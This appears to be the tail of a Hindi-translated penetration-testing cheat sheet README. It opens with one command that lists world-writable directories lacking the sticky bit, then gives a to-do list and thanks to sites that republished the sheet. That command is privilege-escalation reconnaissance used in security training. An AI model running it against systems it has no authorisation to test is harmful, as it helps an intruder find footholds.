find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
```
## करने की सूची:

- [ ] चीटशीट की पठनीयता में सुधार करें
- [ ] खाली अनुभागों को भरें
- [ ] अनावश्यक अनुभागों को हटाएं
- [ ] रिपॉजिटरी में फ़ाइलों को चीटशीट में एकीकृत करें
- [ ] GitBook में स्थानांतरित करें
- [ ] यदि आवश्यक हो तो चीटशीट में स्क्रीनशॉट/gifs शामिल करें
- [ ] सामग्री की तालिका जोड़ें

## धन्यवाद:

इन लोगों को धन्यवाद जिन्होंने मेरी चीटशीट को अपनी वेबसाइट/ब्लॉग पर शामिल किया:

- [KhaoticDev Cheatsheets](https://khaoticdev.net/cheatsheets/#collections)
- [NCyberSec Facebook Post](https://www.facebook.com/ncybersec/posts/1541830509321001)
- [CyberG0100 Facebook Post](https://www.facebook.com/cyberg0100/posts/github-sinfulzjusttryharder-justtryharder-a-cheat-sheet-which-will-aid-you-throu/653235345249466)
- [r/CyberSpaceVN Reddit Post](https://www.reddit.com/r/CyberSpaceVN/comments/f3n2wp/github_sinfulzjusttryharder_justtryharder_a_cheat)
- [XN4K PWK Cheatsheet](https://xn4k.github.io/pentest/PWK-course-&-the-OSCP-Exam-Cheatsheet/)
- [OpenSourceLibs Pentesting Tools](https://opensourcelibs.com/libs/pentesting-tools)
- [GitMemory (brhannah)](https://gitmemory.com/brhannah)
- [BugBountyTips Blog](https://www.bugbountytips.tech/2020/08/23/justtryharderpwk-cheatsheetkali-linux-cheatsheethydra-cheatsheetsecu-2/)
- [PythonLang OSCP Category](https://pythonlang.dev/category/oscp/)
टूल डाउनलोड करें